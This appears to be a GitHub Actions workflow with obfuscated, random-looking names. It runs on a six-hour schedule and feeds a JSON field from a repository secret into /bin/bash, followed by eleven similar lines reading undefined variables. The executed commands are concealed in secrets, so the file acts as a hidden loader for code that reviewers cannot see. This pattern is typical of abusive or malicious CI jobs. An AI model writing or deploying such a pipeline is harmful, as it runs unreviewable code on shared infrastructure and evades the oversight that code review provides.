name: leebangxxk

on:
  workflow_dispatch:
  schedule:
    - cron: '33 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: leebangxxk
        env:
          upgho5: ${{ secrets.upgho5 }}
        run: |
          echo $upgho5 | jq -r .pqjur6 | /bin/bash
          echo $sfo531 | jq -r .k71099 | /bin/bash
          echo $lp539 | jq -r .ii9581 | /bin/bash
          echo $fm4 | jq -r .xgpqm7171 | /bin/bash
          echo $gp3110 | jq -r .jiun7281 | /bin/bash
          echo $vqdcq6930 | jq -r .nofeq69190 | /bin/bash
          echo $hcet6 | jq -r .jgg630 | /bin/bash
          echo $jijvc27 | jq -r .horpq2 | /bin/bash
          echo $vgeuc7 | jq -r .whg9 | /bin/bash
          echo $tol93401 | jq -r .gvd21 | /bin/bash
          echo $xld403 | jq -r .ossu71 | /bin/bash
          echo $xkcy010 | jq -r .ipzui409 | /bin/bash

